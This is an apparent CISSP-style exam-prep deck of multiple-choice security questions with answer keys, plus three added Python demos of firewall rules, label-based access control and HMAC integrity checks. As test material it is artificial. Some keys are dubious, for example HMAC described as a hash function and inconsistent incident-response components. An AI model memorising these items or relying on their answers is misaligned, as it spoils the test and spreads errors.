Your company sells Apple iPods online and has suffered many denial-of-service (DoS) attacks. Your company makes an average $20,000 profit per week, and a typical DoS attack lowers sales by 40%. You suffer seven DoS attacks on average per year. A DoS-mitigation service is available for a subscription fee of $10,000 per month. You have tested this service and believe it will mitigate the attacks. 2. What is the ALE of lost iPod sales due to the DoS attacks? (a) $20,000 (b) $8000 (c) $84,000 (d) $56,000
2. Correct answer and explanation: D. The ALE is derived by first calculating the SLE, which is the AV, $20,000, multiplied by the EF, 40%. The SLE is $8000, which is multiplied by the ARO of 7 for an ALE of $56,000. Incorrect answers and explanations: Answers A, B, and C are incorrect. $20,000 is the AV, while $8000 is the SLE.
254
Your company sells Apple iPods online and has suffered many denial-of-service (DoS) attacks. Your company makes an average $20,000 profit per week, and a typical DoS attack lowers sales by 40%. You suffer seven DoS attacks on average per year. A DoS-mitigation service is available for a subscription fee of $10,000 per month. You have tested this service and believe it will mitigate the attacks. 3. Is the DoS mitigation service a good investment? (a) Yes, it will pay for itself. (b) Yes, $10,000 is less than the $56,000 ALE. (c) No, the annual TCO is higher than the ALE. (d) No, the annual TCO is lower than the ALE.
3. Correct answer and explanation: C. The TCO of the DoS mitigation service is higher than the ALE of lost sales due to DoS attacks. This means it is less expensive to accept the risk of DoS attacks or to find a less expensive mitigation strategy. Incorrect answers and explanations: Answers A, B, and D are incorrect. The annual TCO is higher, not lower. $10,000 is the monthly TCO; you must calculate yearly TCO to compare with the ALE.
255
4. Which canon of The (ISC)2® Code of Ethics should be considered the most important? (a) Protect society, the commonwealth, and the infrastructure (b) Advance and protect the profession (c) Act honorably, honestly, justly, responsibly, and legally (d) Provide diligent and competent service to principals
4. Correct answer and explanation: A. The canons are applied in order and “To protect society, the commonwealth, and the infrastructure” is the first canon, and is thus the most important of the four canons of The (ISC)2 Code of Ethics. Incorrect answers and explanations: Answers B, C, and D are incorrect. The canons of The (ISC)2 Code of Ethics are presented in order of importance. The second canon requires the security professional to act honorably, honestly, justly, responsibly, and legally. The third mandates that professionals provide diligent and competent service to principals. The final and therefore least important canon wants professionals to advance and protect the profession.
256
Which of the following is NOT a component of the CIA triad? A. Confidentiality B. Integrity C. Availability D. Privacy
Answer: D. Privacy Explanation: The CIA triad consists of confidentiality, integrity, and availability. Privacy is an important security concept but not part of the CIA triad.
257
Which of the following is NOT a category of access control? A. Physical B. Administrative C. Technical D. Financial
Answer: D. Financial Explanation: Access control has three categories: physical, administrative, and technical. Financial is not a category of access control.
258
What is the primary goal of a security risk assessment? A. To eliminate all risks B. To reduce risks to an acceptable level C. To identify all possible risks D. To transfer all risks to a third party
Answer: B. To reduce risks to an acceptable level Explanation: The primary goal of a security risk assessment is to identify and analyze risks and then develop strategies to reduce them to an acceptable level.
259
Which of the following is an example of symmetric key cryptography? A. RSA B. AES C. ElGamal D. Diffie-Hellman
Answer: B. AES Explanation: AES is a symmetric key algorithm, meaning the same key is used for encryption and decryption. RSA, Diffie-Hellman, and ElGamal are examples of asymmetric key algorithms.
260
Which of the following is NOT a common Software Development Life Cycle (SDLC) model? A. Waterfall B. Agile C. Spiral D. Sequential
Answer: D. Sequential Explanation: There is no SDLC model called sequential. The most common SDLC models are Waterfall, Agile, and Spiral.
261
What is the primary purpose of a firewall? A. To prevent unauthorized access to a network B. To detect and remove viruses from a network C. To provide secure remote access to a network D. To encrypt all network traffic
Answer: A. To prevent unauthorized access to a network Explanation: The primary purpose of a firewall is to prevent unauthorized access to a network by blocking traffic that does not meet specific criteria.
262
Which of the following is NOT an example of a physical security control? A. Security cameras B. Biometric scanners C. Firewalls D. Fences
Answer: C. Firewalls Explanation: Firewalls are an example of technical security control, not physical security. Physical security controls include security cameras, biometric scanners, and fences.
263
Which of the following is NOT a type of encryption key? A. Public key B. Private key C. Session key D. Public-private key
Answer: D. Public-private key Explanation: There is no such thing as a public-private key. Public key encryption uses a public and a private key, while symmetric key encryption uses a session key.
264
Which of the following is an example of security control that falls under the security operations domain? A. Penetration testing B. Security awareness training C. Access control D. Application security testing
Answer: B. Security awareness training Explanation: Security awareness training is a security control that falls under the security operations domain. It aims to educate employees about their responsibilities in maintaining the organization’s security posture and helps them recognize and respond to potential threats. Penetration testing is not a correct answer because it falls under the Security Assessment and Testing domain, which involves evaluating an organization’s security posture by simulating real-world attacks. Access control is not a correct answer because it falls under the Identity and Access Management (IAM) domain, which deals with controlling who has access to resources and ensuring that only authorized individuals can access those resources. Application security testing is not a correct answer because it falls under the Software Development Security domain, which focuses on ensuring the security of applications throughout their development life cycle.
265
Which of the following is NOT a security incident response plan component? A. Preparation B. Detection C. Mitigation D. Penetration
Answer: D. Penetration Explanation: Penetration is not a component of a security incident response plan. The three primary components of a security incident response plan are preparation, detection, and mitigation. Preparation involves developing policies, procedures, and controls to prevent security incidents from occurring. Detection consists of identifying and analyzing security incidents when they occur. Mitigation consists of responding to and containing the impact of security incidents and preventing similar incidents from occurring.
266
Which of the following is an example of technical security control? A. Background checks B. Security awareness training C. Intrusion detection system D. Facility access controls
Answer: C. Intrusion detection system Explanation: Technical security controls use technology to prevent, detect, or respond to security threats. Examples include firewalls, antivirus software, and intrusion detection systems.
267
Which of the following is NOT an example of a common authentication factor? A. Something you know B. Something you have C. Something you are D. Something you want
Answer: D. Something you want Explanation: The three common authentication factors are something you know (e.g., password), something you have (e.g., token), and something you are (e.g., biometric). Something you want is not a recognized authentication factor.
268
Which of the following is a security control that falls under the security assessment and testing domain? A. Change management B. Vulnerability scanning C. Disaster recovery D. Incident response
Answer: B. Vulnerability scanning Explanation: Vulnerability scanning is a security control under the security assessment and testing domain. It involves scanning a system for known vulnerabilities and weaknesses.
269
Which of the following is NOT a common type of access control model? A. Discretionary access control (DAC) B. Mandatory access control (MAC) C. Role-based access control (RBAC) D. Access control list (ACL)
Answer: D. Access control list (ACL) Explanation: Access control lists (ACLs) are a common implementation of access control but are not themselves an access control model. The three common access control models are discretionary access control (DAC), mandatory access control (MAC), and role-based access control (RBAC).
270
Which of the following is a key consideration when designing a secure network architecture? A. High availability B. Low cost C. Easy administration D. High bandwidth
Answer: A. High availability Explanation: A key consideration when designing a secure network architecture is ensuring the high availability of critical services and resources. While cost, administration, and bandwidth are also important, they are secondary to availability in the context of security.
271
What is the purpose of a security baseline? A. To establish the minimum security requirements for a system or application B. To identify and prioritize security risks based on their potential impact C. To monitor and report on security events and incidents D. To test the effectiveness of security controls in a simulated attack environment
Answer: A. To establish the minimum security requirements for a system or application Explanation: A security baseline is a set of minimum security requirements that a system or application must meet to be considered secure. It serves as a starting point for security configuration and helps ensure security controls are implemented consistently across the organization.
272
Which of the following is NOT a common method of authentication? A. Password B. Certificate C. Token D. Proxy
Answer: D. Proxy Explanation: Proxy is not a method of authentication. The three common methods of authentication are something you know (e.g., password), something you have (e.g., token), and something you are (e.g., biometric). The certificate is a type of token-based authentication.
273
What is the primary goal of a security audit? A. To identify and assess security risks B. To monitor and report on security events and incidents C. To test the effectiveness of security controls D. To ensure compliance with security policies and standards
Answer: D. To ensure compliance with security policies and standards Explanation: A security audit systematically evaluates an organization’s security policies, standards, and procedures to ensure compliance with established security requirements.
274
Which of the following is a key principle of secure software development? A. Agile development B. Security by design C. Minimum viable product D. Continuous integration
Answer: B. Security by design Explanation: Security by design is a key principle of secure software development that involves considering security requirements throughout the entire Software Development Life Cycle rather than as an afterthought.
275
Which of the following is NOT a key component of an incident response plan? A. Preparation B. Detection and analysis C. Containment, eradication, and recovery D. Termination
Answer: D. Termination Explanation: Termination is not a key component of an incident response plan. The three primary components are preparation, detection and analysis, and containment, eradication, and recovery.
276
Which of the following are NOT examples of a non-repudiation control? A. Digital signatures B. Audit trails C. Two-factor authentication D. Passwords
Answer: C. Two-factor authentication and D. Passwords Explanation: Non-repudiation controls prevent the denial of an action or transaction. Digital signatures and audit trails are examples of non-repudiation controls, as they prove a transaction’s origin and integrity. Two-factor authentication provides authentication and authorization but does not prevent repudiation. Passwords are not a non-repudiation control.
277
Which of the following is NOT an example of technical security control? A. Firewalls B. Biometric authentication C. Background checks D. Intrusion detection systems
Answer: C. Background checks Explanation: Background checks are a type of administrative security control, not a technical security control. Technical security controls involve using technology to prevent, detect, or respond to security threats.
278
Which of the following is crucial when designing a secure network topology? A. Network bandwidth B. Network latency C. Network availability D. Network throughput
Answer: C. Network availability Explanation: Network availability is crucial when designing a secure network topology. The network must be designed to ensure that critical services and resources are available when needed while minimizing downtime and disruption in the event of an attack or failure.
279
Which of the following is a crucial principle of secure software development? A. Continuous delivery B. Code obfuscation C. Defense in depth D. Secure coding
Answer: D. Secure coding Explanation: Secure coding is a key principle of secure software development that involves writing code free from security vulnerabilities and exploits. This helps prevent the introduction of security weaknesses into the software and reduces the risk of a successful attack.
280
Which of the following is NOT a type of access control? A. Identity verification B. Authorization C. Accountability D. Authentication
Answer: C. Accountability Explanation: Accountability is not a type of access control but rather a concept related to responsibility and liability for actions taken. The three common types of access control are authentication, authorization, and audit/monitoring.
281
Which of the following is a crucial benefit of using cloud computing for security? A. Increased control over data security B. Improved physical security of data centers C. Reduced risk of insider threats D. Improved disaster recovery capabilities
Answer: D. Improved disaster recovery capabilities Explanation: Cloud computing can improve disaster recovery by providing redundant infrastructure and data backups in multiple locations. While cloud providers may also offer enhanced physical security and other benefits, improved disaster recovery is a key benefit for protection.
282
Which of the following is crucial when designing secure Mobile Device Management? A. Protecting against insider threats B. Providing high-bandwidth connectivity C. Ensuring device compatibility with all apps D. Enforcing data encryption and access control policies
Answer: D. Enforcing data encryption and access control policies Explanation: Enforcing data encryption and access control policies is a key consideration for secure Mobile Device Management. Mobile devices are highly portable and often contain sensitive data, making encryption and access control critical for protecting against unauthorized access or data loss.
283
Which of the following is a key principle of secure password management? A. Requiring password changes every 90 days B. Using long, complex passwords C. Storing passwords in a centralized database D. Sharing passwords with trusted colleagues
Answer: B. Using long, complex passwords Explanation: Using long, complex passwords is a key principle of secure password management. Requiring password changes too frequently can lead to weaker passwords, while storing passwords in a centralized database or sharing passwords increases the risk of unauthorized access.
284
Which of the following is NOT a common type of access control model? A. Role-based access control (RBAC) B. Mandatory access control (MAC) C. Discretionary access control (DAC) D. Hierarchical access control (HAC)
Answer: D. Hierarchical access control (HAC) Explanation: Hierarchical access control (HAC) is not a recognized access control model. The three common access control models are role-based access control (RBAC), mandatory access control (MAC), and discretionary access control (DAC).
285
Which of the following is a key consideration when designing secure network segmentation? A. Maximizing network throughput B. Minimizing network latency C. Isolating critical systems and resources D. Providing open access to all users
Answer: C. Isolating critical systems and resources Explanation: Isolating critical systems and resources is a key consideration when designing secure network segmentation. Segmenting the network can help limit the impact of a security breach or failure, but it is important to ensure that critical systems and resources are properly isolated and protected.
286
Which of the following is a primary consideration when designing secure virtualization environments? A. Providing unrestricted access to virtual resources B. Ensuring compatibility with all virtualization platforms C. Securing virtual machine images and snapshots D. Maximizing virtual machine density
Answer: C. Securing virtual machine images and snapshots Explanation: Securing virtual machine images and snapshots is a key consideration when designing secure virtualization environments. Virtual machines can be easily copied or cloned, potentially exposing sensitive data or allowing unauthorized access. Proper security measures must be taken to secure virtual machine images and snapshots.
287
Which of the following is a critical principle of secure network design? A. Maximizing network throughput B. Minimizing network complexity C. Providing unrestricted access to all network resources D. Using open standards and protocols
Answer: B. Minimizing network complexity Explanation: Minimizing network complexity is a key principle of secure network design. Complex networks are more difficult to manage and secure and can increase the risk of security breaches or failures. Simplifying the network and reducing complexity can help improve security.
288
Which of the following is NOT a type of vulnerability? A. Zero-day vulnerability B. Privilege escalation vulnerability C. Buffer overflow vulnerability D. Social engineering vulnerability
Answer: D. Social engineering vulnerability Explanation: Social engineering is a technique that manipulates people into divulging sensitive information or performing actions that compromise security. It is not a type of vulnerability. The three types of vulnerabilities listed are commonly found in software or systems.
289
Which of the following is a crucial consideration when designing secure cloud architecture? A. Maximizing control over cloud infrastructure B. Using proprietary cloud technologies C. Ensuring compliance with applicable regulations and standards D. Avoiding the use of third-party cloud providers
Answer: C. Ensuring compliance with applicable regulations and standards Explanation: Ensuring compliance with applicable regulations and standards is a key consideration when designing secure cloud architecture. Cloud providers must comply with various regulations and standards, such as GDPR or HIPAA, depending on the industry and the data stored in the cloud.
290
Which of the following is a key principle of secure application development? A. Requiring all code to be written in-house B. Using open source libraries and frameworks C. Implementing secure coding practices D. Focusing on functionality over security
Answer: C. Implementing secure coding practices Explanation: Implementing secure coding practices is a key principle of secure application development. Secure coding involves writing code free from security vulnerabilities and exploits and incorporating security considerations throughout the Software Development Life Cycle.
291
Which of the following is a primary consideration when implementing secure remote access? A. Providing unrestricted access to all network resources B. Using weak authentication mechanisms C. Minimizing network segmentation and access controls D. Enforcing strong encryption and access controls
Answer: D. Enforcing strong encryption and access controls Explanation: Enforcing strong encryption and access controls is a key consideration when implementing secure remote access. Remote access can expose sensitive data and resources to unauthorized access, so it is important to use strong authentication mechanisms and enforce proper access controls.
292
Which of the following is an essential principle of secure data classification? A. Treating all data as sensitive and confidential B. Using open data standards and formats C. Applying consistent data classification criteria D. Allowing data to be stored on any device or platform
Answer: C. Applying consistent data classification criteria Explanation: Applying consistent data classification criteria is a key principle of secure data classification. Data classification involves categorizing data based on its sensitivity and value and applying appropriate security controls based on the classification. Consistency in classification criteria helps ensure that data is properly protected across the organization.
293
Which of the following is NOT a common type of encryption algorithm? A. AES B. RSA C. SHA-256 D. HMAC
Answer: D. HMAC Explanation: HMAC (Hash-based Message Authentication Code) is a cryptographic hash function, not an encryption algorithm. The three common encryption algorithms listed are commonly used for encryption and decryption.
294
Which of the following is a key principle of secure incident response? A. Ignoring minor incidents to focus on major incidents B. Minimizing response time to all incidents C. Conducting thorough post-incident analysis and review D. Assigning blame and punishing those responsible
Answer: C. Conducting thorough post-incident analysis and review Explanation: Conducting thorough post-incident analysis and review is a key principle of secure incident response. Incident response involves detecting, analyzing, and responding to security incidents, and conducting a post-incident analysis and review helps identify areas for improvement and strengthen the organization’s security posture.
295
Which of the following is essential when implementing secure data storage? A. Maximizing data availability B. Using open data formats and standards C. Securing data at rest and in transit D. Storing all data on a single device or platform
Answer: C. Securing data at rest and in transit Explanation: Securing data at rest and in transit is a key consideration when implementing secure data storage. Data must be protected against unauthorized access or disclosure, whether stored on disk or transmitted across the network. Encryption and access controls are commonly used to secure data at rest and in transit.
296
Which of the following is a key concept of risk management? A. Avoid all risks B. Accept all risks C. Transfer all risks D. Risk decisions should be based on the impact on the business
Answer: D. Risk decisions should be based on the impact on the business. Explanation: Risk decisions should be made case by case, considering the unique context and potential impact on the business. A one-size-fits-all approach to risk management is not effective. Instead, an organization should evaluate each risk regarding its potential impact and decide the most appropriate risk response strategy: accept, avoid, transfer, or mitigate.
297
What is the purpose of data classification? A. To ensure data privacy B. To ensure data integrity C. To ensure data availability D. To facilitate appropriate levels of protection based on value or sensitivity
Answer: D. To facilitate appropriate levels of protection based on value or sensitivity. Explanation: Data classification is essential to an organization’s information security strategy. By classifying data, organizations can apply appropriate levels of protection to sensitive information and ensure that resources are allocated efficiently.
298
What is the primary purpose of a firewall in network security? A. To facilitate network routing B. To control network traffic based on predetermined security rules C. To encrypt network traffic D. To store network data
Answer: B. To control network traffic based on predetermined security rules Explanation: A firewall is a network security device that monitors incoming and outgoing network traffic and decides whether to allow or block specific traffic based on a defined set of security rules. It is a critical piece of a network security infrastructure and can help prevent unauthorized access to or from a network.
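The rule evaluation described above, as an added example that is not part of the original flashcard deck: a first-match packet filter with an implicit default deny, plus a check for rules that an earlier rule already covers (shadowed rules). The rule format, ruleset and packets are constructed for illustration.

```python
"""First-match packet filter with an implicit default deny.

Added example, not from the original flashcard deck. The rule format, the
sample ruleset and the sample packets are constructed for illustration.
"""
from dataclasses import dataclass
from typing import List, Optional
import ipaddress


@dataclass(frozen=True)
class Rule:
    action: str            # "allow" or "deny"
    proto: str             # "tcp", "udp" or "any"
    src: str               # source CIDR, "0.0.0.0/0" for any
    dst: str               # destination CIDR
    dport: Optional[int]   # destination port, None for any


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    dst: str
    dport: int


def matches(rule: Rule, pkt: Packet) -> bool:
    """True when every field of the rule covers the packet."""
    if rule.proto != "any" and rule.proto != pkt.proto:
        return False
    if ipaddress.ip_address(pkt.src) not in ipaddress.ip_network(rule.src, strict=False):
        return False
    if ipaddress.ip_address(pkt.dst) not in ipaddress.ip_network(rule.dst, strict=False):
        return False
    return rule.dport is None or rule.dport == pkt.dport


def decide(rules: List[Rule], pkt: Packet) -> str:
    """Walk the ruleset in order; the first matching rule wins. Traffic that no
    rule mentions is dropped (default deny), the posture a firewall should take."""
    for rule in rules:
        if matches(rule, pkt):
            return rule.action
    return "deny"


def covers(outer: Rule, inner: Rule) -> bool:
    """True when every packet that matches `inner` also matches `outer`."""
    return (
        (outer.proto == "any" or outer.proto == inner.proto)
        and ipaddress.ip_network(inner.src, strict=False).subnet_of(
            ipaddress.ip_network(outer.src, strict=False))
        and ipaddress.ip_network(inner.dst, strict=False).subnet_of(
            ipaddress.ip_network(outer.dst, strict=False))
        and (outer.dport is None or outer.dport == inner.dport)
    )


def shadowed(rules: List[Rule]) -> List[int]:
    """Indices of rules that can never fire because an earlier rule already covers
    everything they would match. A shadowed rule is dead weight at best; at worst it
    is a rule an operator believes is in effect but is not."""
    return [j for j in range(len(rules))
            if any(covers(rules[i], rules[j]) for i in range(j))]


# Constructed ruleset protecting a single server, 10.1.2.3.
RULES = [
    Rule("allow", "tcp", "10.0.0.0/8", "10.1.2.3/32", 443),    # internal users -> HTTPS
    Rule("deny", "any", "0.0.0.0/0", "10.1.2.3/32", 22),       # nobody reaches SSH
    Rule("allow", "tcp", "10.9.0.0/16", "10.1.2.3/32", None),  # admin subnet -> any TCP port
    Rule("allow", "tcp", "10.5.0.0/16", "10.1.2.3/32", 443),   # shadowed by the first rule
]

if __name__ == "__main__":
    for pkt in (Packet("tcp", "10.9.1.1", "10.1.2.3", 22),
                Packet("tcp", "10.5.6.7", "10.1.2.3", 8080),
                Packet("tcp", "192.168.1.1", "10.1.2.3", 443)):
        print(pkt, "->", decide(RULES, pkt))
    print("shadowed rule indices:", shadowed(RULES))
```

Rule order matters: the admin subnet's SSH is still blocked because the deny rule sits above the broad allow, and anything not listed (other sources, UDP) falls through to the default deny.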
299
What is the primary aspect of security in the Software Development Life Cycle? A. Using a single programming language B. Testing the software only at the end of the development C. Integrating security throughout the life cycle, including design, development, and testing D. Ignoring security during development and adding it later
Answer: C. Integrating security throughout the life cycle, including design, development, and testing. Explanation: Security should be a key consideration throughout the entire software development life cycle, not just at the end. This approach, often called “security by design,” helps ensure that security is integrated into the software from the ground up and can help identify and mitigate vulnerabilities early in the development process.
300
Which type of access control model uses labels and levels of protection to determine access? A. Role-based access control (RBAC) B. Discretionary access control (DAC) C. Mandatory access control (MAC) D. None of the above
Answer: C. Mandatory access control (MAC) Explanation: Mandatory access control (MAC) compares a subject's clearance label with an object's classification label (levels such as confidential, secret, and top secret, often combined with compartments) under a policy enforced by the system. In a MAC model, neither users nor the owners of objects have the discretion to decide who may access the information; that is what distinguishes it from DAC.
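A label-based access decision of the kind the card describes, as an added example that is not part of the original deck. It applies the Bell-LaPadula rules, which the card does not name: a subject may read an object only when the subject's label dominates the object's (no read up) and may write to it only when the object's label dominates the subject's (no write down). The levels, compartments and sample labels are constructed.

```python
"""Mandatory access control decisions from security labels.

Added example, not from the original flashcard deck. Uses the Bell-LaPadula
simple security property (no read up) and *-property (no write down); the
ordering of levels and the sample labels are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, Set

# Fixed by policy: neither users nor object owners can change this ordering.
LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2, "top secret": 3}


@dataclass(frozen=True)
class Label:
    level: str
    compartments: FrozenSet[str] = frozenset()

    def __post_init__(self) -> None:
        if self.level not in LEVELS:
            raise ValueError(f"unknown level {self.level!r}")

    def dominates(self, other: "Label") -> bool:
        """Lattice ordering: level at least as high AND a superset of compartments.
        Two labels can be incomparable (neither dominates the other), for example
        secret/{crypto} versus secret/{nuclear}."""
        return (LEVELS[self.level] >= LEVELS[other.level]
                and other.compartments <= self.compartments)


def can_read(subject: Label, obj: Label) -> bool:
    """Simple security property: no read up."""
    return subject.dominates(obj)


def can_write(subject: Label, obj: Label) -> bool:
    """*-property: no write down, so high data cannot leak into a low object."""
    return obj.dominates(subject)


def access(subject: Label, obj: Label, mode: str) -> bool:
    checks = {"read": can_read, "write": can_write}
    if mode not in checks:
        raise ValueError(f"unknown mode {mode!r}")
    return checks[mode](subject, obj)


def reachable(subject: Label, objects: Dict[str, Label]) -> Dict[str, Set[str]]:
    """Map each object name to the modes this subject is permitted; handy for
    reviewing what a clearance actually grants before it is issued."""
    return {name: {m for m in ("read", "write") if access(subject, lab, m)}
            for name, lab in objects.items()}


# Constructed subject and objects.
ANALYST = Label("secret", frozenset({"crypto"}))
OBJECTS = {
    "crypto_brief": Label("confidential", frozenset({"crypto"})),
    "crypto_plan": Label("secret", frozenset({"crypto"})),
    "sigint_tasking": Label("top secret", frozenset({"crypto"})),
    "nuclear_memo": Label("secret", frozenset({"nuclear"})),
    "public_notice": Label("unclassified"),
}

if __name__ == "__main__":
    for name, modes in reachable(ANALYST, OBJECTS).items():
        print(f"{name:15s} {sorted(modes) or ['no access']}")
```

The secret/{crypto} analyst can read the confidential brief but not write to it, can write to (but not read) the top secret tasking, and gets no access at all to the secret/{nuclear} memo because the two labels are incomparable; none of these outcomes can be changed by the objects' owners.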
301
What is the primary goal of a business continuity plan (BCP)? A. To provide a framework for building network infrastructure B. To establish steps to take for immediate response to a security incident C. To ensure the continuation of business processes during and after a disruption D. To provide a framework for prosecuting hackers
Answer: C. To ensure the continuation of business processes during and after a disruption Explanation: The primary goal of a business continuity plan (BCP) is to ensure the continuation of business processes during and after a disruption. The BCP is a comprehensive plan to maintain or resume business during a disruption.
302
In the context of cryptography, what does “integrity” ensure? A. That the data is accessible when needed B. That the data has not been altered during transmission C. That the data is kept confidential D. That the sender of the data can be authenticated
Answer: B. That the data has not been altered during transmission Explanation: In cryptography, "integrity" ensures that the data has not been altered in transit or in storage. Alteration can be accidental, such as corruption during transmission, or intentional, such as a malicious modification; a plain checksum catches the former, while detecting the latter requires a keyed mechanism such as a MAC or a digital signature.
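The distinction between accidental and deliberate alteration, and why HMAC (question 293) is an integrity mechanism rather than encryption, as an added example that is not part of the original deck: an unkeyed SHA-256 digest can be recomputed by whoever rewrites the message, while a keyed HMAC cannot be forged without the key. The key and messages are constructed; in practice the key lives in a secrets store and never travels with the message.

```python
"""Integrity check with a plain hash versus a keyed MAC.

Added example, not from the original flashcard deck. KEY, ORDER and FORGED are
constructed for illustration.
"""
import hashlib
import hmac

KEY = b"constructed-demo-key-do-not-reuse"   # constructed; real keys come from a secrets store
ORDER = b"transfer 100 to alice"              # constructed message
FORGED = b"transfer 1000 to mallory"          # what an active attacker substitutes


def plain_digest(msg: bytes) -> str:
    return hashlib.sha256(msg).hexdigest()


def plain_check(msg: bytes, digest: str) -> bool:
    """Detects accidental corruption only: anyone can recompute the digest."""
    return hmac.compare_digest(plain_digest(msg), digest)


def mac(key: bytes, msg: bytes) -> str:
    """HMAC-SHA256 over the message. The message itself stays readable; HMAC gives
    integrity and origin authentication, not confidentiality."""
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def mac_check(key: bytes, msg: bytes, tag: str) -> bool:
    """Constant-time comparison so the check does not leak the tag byte by byte."""
    return hmac.compare_digest(mac(key, msg), tag)


def flip_bit(msg: bytes, index: int) -> bytes:
    """Simulate accidental corruption of one bit in transit."""
    b = bytearray(msg)
    b[index] ^= 0x01
    return bytes(b)


def plain_hash_survives_tampering() -> bool:
    """Sender ships (ORDER, sha256(ORDER)). The attacker replaces both fields using only
    public information, and the receiver's check still passes."""
    tampered_msg, tampered_digest = FORGED, plain_digest(FORGED)
    return plain_check(tampered_msg, tampered_digest)   # True: tampering undetected


def mac_detects_tampering() -> bool:
    """With HMAC the attacker's best attempts (reuse the old tag, send an unkeyed hash,
    or guess a key) are all rejected."""
    genuine_tag = mac(KEY, ORDER)
    attempts = [genuine_tag, plain_digest(FORGED), mac(b"guess", FORGED)]
    return not any(mac_check(KEY, FORGED, t) for t in attempts)


def mac_detects_corruption() -> bool:
    """The same tag also catches a single flipped bit ("100" becoming "000")."""
    tag = mac(KEY, ORDER)
    return mac_check(KEY, ORDER, tag) and not mac_check(KEY, flip_bit(ORDER, 9), tag)


if __name__ == "__main__":
    print("plain hash fooled by substitution:", plain_hash_survives_tampering())
    print("HMAC rejects substitution:        ", mac_detects_tampering())
    print("HMAC rejects bit flip:            ", mac_detects_corruption())
```

Note that `hmac.compare_digest` is used for both checks; even the unkeyed comparison should not be a timing oracle, but the real difference between the two is the secret key, not the comparison.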
303
What is the primary purpose of penetration testing? A. To gain unauthorized access to systems for malicious purposes B. To evaluate the effectiveness of security controls C. To troubleshoot network connectivity issues D. To monitor network traffic in real time
Answer: B. To evaluate the effectiveness of security controls Explanation: The primary purpose of penetration testing is to evaluate the effectiveness of security controls by simulating an attack. By identifying vulnerabilities and testing security measures, organizations can better understand their security posture and make informed decisions about risk management.
304
What is a key concept of identity and access management? A. Granting every user full access to all systems B. Granting users the minimum access necessary to perform their job function C. Not revoking access rights when a user changes roles D. Allowing shared accounts for convenience
Answer: B. Granting users the minimum access necessary to perform their job function Explanation: A key principle of Identity and Access Management is granting users the minimum access necessary to perform their job functions. This principle, known as the principle of least privilege, is critical for reducing the risk of unauthorized access or actions.
305
Which one of the following is NOT a part of the CIA triad in information security? A. Confidentiality B. Integrity C. Availability D. Authenticity
Answer: D. Authenticity Explanation: The CIA triad in information security stands for confidentiality, integrity, and availability. While authenticity is an important concept in information security, it is not a part of the CIA triad.
306
What does the term “least privilege” mean in the context of information security? A. Granting users only the permissions they need to perform their job functions B. Giving all users the same level of access to information C. Limiting access to information to the highest ranking individuals in an organization D. Granting all users full access to information but tracking their activities
Answer: A. Granting users only the permissions they need to perform their job functions Explanation: The principle of least privilege is a computer security concept in which users are given the minimum access necessary to complete their job functions. This helps to reduce the potential damage caused by errors or malicious actions.
307
Which of the following best describes “phishing”? A. A method of securing a network by blocking certain websites B. An attack that involves sending deceptive emails to trick individuals into revealing sensitive information C. A physical security measure used to protect sensitive information D. A type of malware that replicates itself across a network
Answer: B. An attack that involves sending deceptive emails to trick individuals into revealing sensitive information Explanation: Phishing is a social-engineering attack that uses deceptive messages, most commonly email, to lure recipients into disclosing credentials or other sensitive data or into taking a harmful action such as opening a malicious attachment or link.
308
What does “IDS” stand for in the context of information security? A. Information Data System B. Integrated Defense Strategy C. Intrusion Detection System D. Internal Domain Security
Answer: C. Intrusion detection system Explanation: In the context of information security, IDS stands for intrusion detection system: a device or software application that monitors a network or systems for malicious activity or policy violations and raises alerts.
309
What type of security control is a biometric scanner? A. Physical B. Technical C. Administrative D. Operational
Answer: B. Technical Explanation: A biometric scanner is a technical security control. Technical controls are hardware or software tools, such as firewalls, encryption, and authentication mechanisms like biometric scanners, designed to protect systems and data.
310
What are the three primary components of risk? A. Threat, consequence, vulnerability B. Impact, threat, vulnerability C. Asset, threat, impact D. Asset, impact, consequence
Answer: B. Impact, threat, vulnerability Explanation: Risk is typically composed of three components: threat (a potential cause of an incident that may result in harm), vulnerability (a weakness that can be exploited by a threat), and impact (the potential harm caused by a threat exploiting a vulnerability)
311
Which risk treatment option involves an organization deciding to tolerate a risk without implementing additional controls? A. Risk avoidance B. Risk mitigation C. Risk transfer D. Risk acceptance
Answer: D. Risk acceptance Explanation: Risk acceptance is when an organization decides to acknowledge a risk but does not implement additional controls or measures to address it. The other options (avoidance, mitigation, and transfer) all involve taking some action to address the risk.
312
Which of the following is NOT a component of the ISC2 Code of Ethics? A. Protect society and the infrastructure B. Act honorably, honestly, and legally C. Provide diligent and competent service D. Prioritize personal gain over professional duties
Answer: D. Prioritize personal gain over professional duties Explanation: The ISC2 Code of Ethics includes the principles of protecting society and the infrastructure; acting honorably, honestly, and legally; and providing diligent and competent service. Prioritizing personal gain over professional duties is contrary to the ethical principles outlined by ISC2.
313
In the context of business continuity and disaster recovery planning, what does it mean to “identify critical business functions”? A. Determining the most essential functions and processes of the organization B. Identifying potential disruptions to business functions C. Implementing recovery plans for all business functions D. Regularly testing business functions for potential disruptions
Answer: A. Determining the most essential functions and processes of the organization Explanation: Identifying critical business functions involves determining the most essential functions and processes of the organization, which should be prioritized for recovery during an incident. This is a crucial first step in business continuity and disaster recovery planning. The other options are also part of the planning process, but they do not define what it means to “identify critical business functions.”
314
Which of the following best describes a qualitative risk assessment? A. It uses numerical values to estimate risk. B. It relies on subjective judgments to rank risk. C. It calculates the financial value of a risk. D. It identifies the vulnerabilities that might be exploited by threats.
Answer: B. It relies on subjective judgments to rank risk. Explanation: A qualitative risk assessment uses subjective judgments and expert opinions to rank risks, often categorizing them as low, medium, or high. In contrast, a quantitative risk assessment uses numerical values and calculations to estimate risks.
315
What does the asset valuation method of “business impact” involve? A. Calculating the cost of maintaining or replacing an asset B. Determining the asset’s worth based on market demand C. Evaluating the potential impact on operations if the asset is compromised D. Considering the asset’s contribution to the organization’s intellectual property
Answer: C. Evaluating the potential impact on operations if the asset is compromised Explanation: The “business impact” asset valuation method involves evaluating the potential impact on the organization’s operations, reputation, or bottom line if the asset is compromised. The other options correspond to different asset valuation methods: “financial value,” “market value,” and “intangible value,” respectively.
316
Which of the following is NOT a key element of effective risk communication and reporting? A. Clarity B. Timeliness C. Consistency D. Complexity
Answer: D. Complexity Explanation: Effective risk communication and reporting should be clear, timely, and consistent. Complexity, particularly in the form of jargon and technical terms, can actually hinder effective communication and should be avoided when possible.
317
